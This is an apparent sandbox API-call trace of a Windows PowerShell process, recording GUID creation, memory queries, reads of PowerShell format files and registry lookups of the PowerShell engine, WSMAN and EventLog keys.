	[0318.403] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x44b8a9a5, Data2=0x70d3, Data3=0x4150, Data4=([0]=0x8d, [1]=0xea, [2]=0xc7, [3]=0x99, [4]=0xb6, [5]=0x4, [6]=0x54, [7]=0x6a))) returned 0x0
	[0318.404] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xba8d89c9, Data2=0xc289, Data3=0x4c7d, Data4=([0]=0xab, [1]=0x12, [2]=0xf6, [3]=0x5b, [4]=0x5, [5]=0xce, [6]=0xa6, [7]=0x81))) returned 0x0
	[0318.404] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x50854737, Data2=0x8608, Data3=0x4e9b, Data4=([0]=0xbe, [1]=0xc3, [2]=0xa2, [3]=0x1c, [4]=0x94, [5]=0xdf, [6]=0x5c, [7]=0x52))) returned 0x0
	[0318.404] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xf95639d1, Data2=0x9d2e, Data3=0x4fea, Data4=([0]=0xb2, [1]=0x80, [2]=0x35, [3]=0x32, [4]=0x50, [5]=0xab, [6]=0x36, [7]=0x64))) returned 0x0
	[0318.404] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x21b3ecea, Data2=0x24a1, Data3=0x472a, Data4=([0]=0xba, [1]=0x1d, [2]=0x8, [3]=0x39, [4]=0xb1, [5]=0xc2, [6]=0x2e, [7]=0x3f))) returned 0x0
	[0318.404] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xf15d3271, Data2=0xefe5, Data3=0x42aa, Data4=([0]=0x8a, [1]=0x7e, [2]=0x24, [3]=0x1d, [4]=0xb0, [5]=0x5f, [6]=0xa4, [7]=0x38))) returned 0x0
	[0318.404] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.404] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x2def2e09, Data2=0x9cb6, Data3=0x460c, Data4=([0]=0xaa, [1]=0xe2, [2]=0xfa, [3]=0x14, [4]=0x61, [5]=0x69, [6]=0x9a, [7]=0x38))) returned 0x0
	[0318.405] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xd26aa6d0, Data2=0xec, Data3=0x45c4, Data4=([0]=0xa0, [1]=0xb3, [2]=0x3c, [3]=0xdb, [4]=0x69, [5]=0x48, [6]=0xd5, [7]=0xf4))) returned 0x0
	[0318.405] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x50bcb4ca, Data2=0xbe3, Data3=0x44d4, Data4=([0]=0x8c, [1]=0x8d, [2]=0xfa, [3]=0x53, [4]=0xc7, [5]=0x72, [6]=0x50, [7]=0x3e))) returned 0x0
	[0318.405] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xea2a6451, Data2=0x8e08, Data3=0x4ebe, Data4=([0]=0x8a, [1]=0xe, [2]=0xc3, [3]=0xb1, [4]=0xfe, [5]=0xc0, [6]=0xb7, [7]=0x52))) returned 0x0
	[0318.405] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x628955d8, Data2=0x1ae, Data3=0x4cec, Data4=([0]=0xbe, [1]=0xc, [2]=0x2e, [3]=0xbc, [4]=0x92, [5]=0xf, [6]=0x78, [7]=0xca))) returned 0x0
	[0318.405] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.405] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xc67d9b61, Data2=0xd0f1, Data3=0x4721, Data4=([0]=0x9a, [1]=0x60, [2]=0x97, [3]=0x72, [4]=0x55, [5]=0x50, [6]=0xf9, [7]=0xab))) returned 0x0
	[0318.405] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb97857e9, Data2=0x1e52, Data3=0x4e75, Data4=([0]=0xa3, [1]=0x80, [2]=0xcb, [3]=0x2f, [4]=0x7f, [5]=0x87, [6]=0x16, [7]=0xa2))) returned 0x0
	[0318.406] VirtualQuery (in: lpAddress=0x28bb90, lpBuffer=0x28ca50, dwLength=0x30 | out: lpBuffer=0x28ca50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.406] VirtualQuery (in: lpAddress=0x28bb90, lpBuffer=0x28ca50, dwLength=0x30 | out: lpBuffer=0x28ca50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.406] VirtualQuery (in: lpAddress=0x28bb90, lpBuffer=0x28ca50, dwLength=0x30 | out: lpBuffer=0x28ca50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.406] VirtualQuery (in: lpAddress=0x28bb90, lpBuffer=0x28ca50, dwLength=0x30 | out: lpBuffer=0x28ca50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.406] SetErrorMode (uMode=0x1) returned 0x1
	[0318.406] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0318.406] SetErrorMode (uMode=0x1) returned 0x1
	[0318.406] GetFileType (hFile=0x304) returned 0x1
	[0318.406] ReadFile (in: hFile=0x304, lpBuffer=0x308ddd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x308ddd8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.407] ReadFile (in: hFile=0x304, lpBuffer=0x308ddd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x308ddd8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.407] ReadFile (in: hFile=0x304, lpBuffer=0x308ddd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x308ddd8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.407] ReadFile (in: hFile=0x304, lpBuffer=0x308ddd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x308ddd8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.407] ReadFile (in: hFile=0x304, lpBuffer=0x308ddd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x308ddd8*, lpNumberOfBytesRead=0x28ceb8*=0x8b4, lpOverlapped=0x0) returned 1
	[0318.407] ReadFile (in: hFile=0x304, lpBuffer=0x308d1f4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x308d1f4*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.408] ReadFile (in: hFile=0x304, lpBuffer=0x308ddd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x308ddd8*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.408] SetErrorMode (uMode=0x1) returned 0x1
	[0318.408] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0318.408] SetErrorMode (uMode=0x1) returned 0x1
	[0318.408] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x304) returned 0x0
	[0318.408] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0318.408] CoTaskMemAlloc (cb=0x5a) returned 0x1b7e4740
	[0318.408] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x1b7e4740, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0318.408] CoTaskMemFree (pv=0x1b7e4740) 
	[0318.408] RegCloseKey (hKey=0x304) returned 0x0
	[0318.408] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x734cb2bc, Data2=0x3ed5, Data3=0x4d61, Data4=([0]=0x81, [1]=0x6f, [2]=0x9e, [3]=0x78, [4]=0xf6, [5]=0xfa, [6]=0xbc, [7]=0x36))) returned 0x0
	[0318.409] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xbc9615af, Data2=0x58b0, Data3=0x4a7e, Data4=([0]=0x86, [1]=0x12, [2]=0x18, [3]=0xc8, [4]=0x38, [5]=0xe3, [6]=0xf1, [7]=0xd6))) returned 0x0
	[0318.409] SetErrorMode (uMode=0x1) returned 0x1
	[0318.409] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0318.409] SetErrorMode (uMode=0x1) returned 0x1
	[0318.409] GetFileType (hFile=0x304) returned 0x1
	[0318.409] ReadFile (in: hFile=0x304, lpBuffer=0x30cbbc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x30cbbc0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.410] ReadFile (in: hFile=0x304, lpBuffer=0x30cbbc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x30cbbc0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.410] ReadFile (in: hFile=0x304, lpBuffer=0x30cbbc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x30cbbc0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.410] ReadFile (in: hFile=0x304, lpBuffer=0x30cbbc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x30cbbc0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.410] ReadFile (in: hFile=0x304, lpBuffer=0x30cbbc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x30cbbc0*, lpNumberOfBytesRead=0x28ceb8*=0xe98, lpOverlapped=0x0) returned 1
	[0318.410] ReadFile (in: hFile=0x304, lpBuffer=0x30cb1c0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x30cb1c0*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.410] ReadFile (in: hFile=0x304, lpBuffer=0x30cbbc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x30cbbc0*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.410] SetErrorMode (uMode=0x1) returned 0x1
	[0318.411] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0318.411] SetErrorMode (uMode=0x1) returned 0x1
	[0318.411] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x304) returned 0x0
	[0318.411] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0318.411] CoTaskMemAlloc (cb=0x5a) returned 0x1b7e4740
	[0318.411] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x1b7e4740, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0318.411] CoTaskMemFree (pv=0x1b7e4740) 
	[0318.411] RegCloseKey (hKey=0x304) returned 0x0
	[0318.411] VirtualQuery (in: lpAddress=0x28b9e0, lpBuffer=0x28c8a0, dwLength=0x30 | out: lpBuffer=0x28c8a0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.411] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xd0a376cc, Data2=0x14e8, Data3=0x45eb, Data4=([0]=0xbe, [1]=0x2f, [2]=0x4e, [3]=0x35, [4]=0x19, [5]=0xd8, [6]=0x2a, [7]=0xad))) returned 0x0
	[0318.412] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x55888e41, Data2=0x7f10, Data3=0x4502, Data4=([0]=0xb9, [1]=0xb9, [2]=0x89, [3]=0xae, [4]=0x56, [5]=0xb2, [6]=0xa6, [7]=0x79))) returned 0x0
	[0318.776] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0318.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.776] CoTaskMemFree (pv=0xed3d0) 
	[0318.777] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0318.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.777] CoTaskMemFree (pv=0xed3d0) 
	[0318.777] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0318.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.778] CoTaskMemFree (pv=0xed3d0) 
	[0318.778] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0318.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.778] CoTaskMemFree (pv=0xed3d0) 
	[0318.782] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0318.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.782] CoTaskMemFree (pv=0xed3d0) 
	[0318.783] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0318.783] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.783] CoTaskMemFree (pv=0xed3d0) 
	[0318.784] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0318.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.784] CoTaskMemFree (pv=0xed3d0) 
	[0318.788] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d158 | out: phkResult=0x28d158*=0x304) returned 0x0
	[0319.133] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d05c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d058*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.133] CoTaskMemFree (pv=0x0) 
	[0319.133] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.133] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0xf9420, lpcchValueName=0x28d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x28d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.134] CoTaskMemFree (pv=0xf9420) 
	[0319.134] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.134] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0xf9420, lpcchValueName=0x28d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x28d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.134] CoTaskMemFree (pv=0xf9420) 
	[0319.134] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.134] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0xf9420, lpcchValueName=0x28d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x28d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.134] CoTaskMemFree (pv=0xf9420) 
	[0319.134] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d0ec, lpData=0x0, lpcbData=0x28d0e8*=0x0 | out: lpType=0x28d0ec*=0x1, lpData=0x0, lpcbData=0x28d0e8*=0x8) returned 0x0
	[0319.135] CoTaskMemAlloc (cb=0xc) returned 0x1605f0
	[0319.135] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d0bc, lpData=0x1605f0, lpcbData=0x28d0b8*=0x8 | out: lpType=0x28d0bc*=0x1, lpData="2.0", lpcbData=0x28d0b8*=0x8) returned 0x0
	[0319.135] CoTaskMemFree (pv=0x1605f0) 
	[0319.577] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0a8 | out: phkResult=0x28d0a8*=0x308) returned 0x0
	[0319.577] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cfac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cfa8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cfac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cfa8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.577] CoTaskMemFree (pv=0x0) 
	[0319.577] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.577] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0xf9420, lpcchValueName=0x28d058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x28d058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.577] CoTaskMemFree (pv=0xf9420) 
	[0319.577] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.577] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0xf9420, lpcchValueName=0x28d058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x28d058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.578] CoTaskMemFree (pv=0xf9420) 
	[0319.578] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.578] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0xf9420, lpcchValueName=0x28d058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x28d058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.578] CoTaskMemFree (pv=0xf9420) 
	[0319.578] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d03c, lpData=0x0, lpcbData=0x28d038*=0x0 | out: lpType=0x28d03c*=0x1, lpData=0x0, lpcbData=0x28d038*=0x8) returned 0x0
	[0319.578] CoTaskMemAlloc (cb=0xc) returned 0x1604d0
	[0319.578] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d00c, lpData=0x1604d0, lpcbData=0x28d008*=0x8 | out: lpType=0x28d00c*=0x1, lpData="2.0", lpcbData=0x28d008*=0x8) returned 0x0
	[0319.578] CoTaskMemFree (pv=0x1604d0) 
	[0319.579] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0319.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0319.579] CoTaskMemFree (pv=0xed3d0) 
	[0319.584] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0319.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0319.584] CoTaskMemFree (pv=0xed3d0) 
	[0319.589] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0d8 | out: phkResult=0x28d0d8*=0x30c) returned 0x0
	[0319.594] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d04c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d048, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d04c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d048*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.594] CoTaskMemFree (pv=0x0) 
	[0319.595] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.595] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.595] CoTaskMemFree (pv=0xf9420) 
	[0319.595] CoTaskMemFree (pv=0x0) 
	[0319.595] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.595] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.595] CoTaskMemFree (pv=0xf9420) 
	[0319.595] CoTaskMemFree (pv=0x0) 
	[0319.595] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.595] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.595] CoTaskMemFree (pv=0xf9420) 
	[0319.595] CoTaskMemFree (pv=0x0) 
	[0319.595] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.595] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.596] CoTaskMemFree (pv=0xf9420) 
	[0319.596] CoTaskMemFree (pv=0x0) 
	[0319.596] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.596] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.596] CoTaskMemFree (pv=0xf9420) 
	[0319.596] CoTaskMemFree (pv=0x0) 
	[0319.596] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0319.596] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0xf9420, lpcchName=0x28d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.596] CoTaskMemFree (pv=0xf9420) 
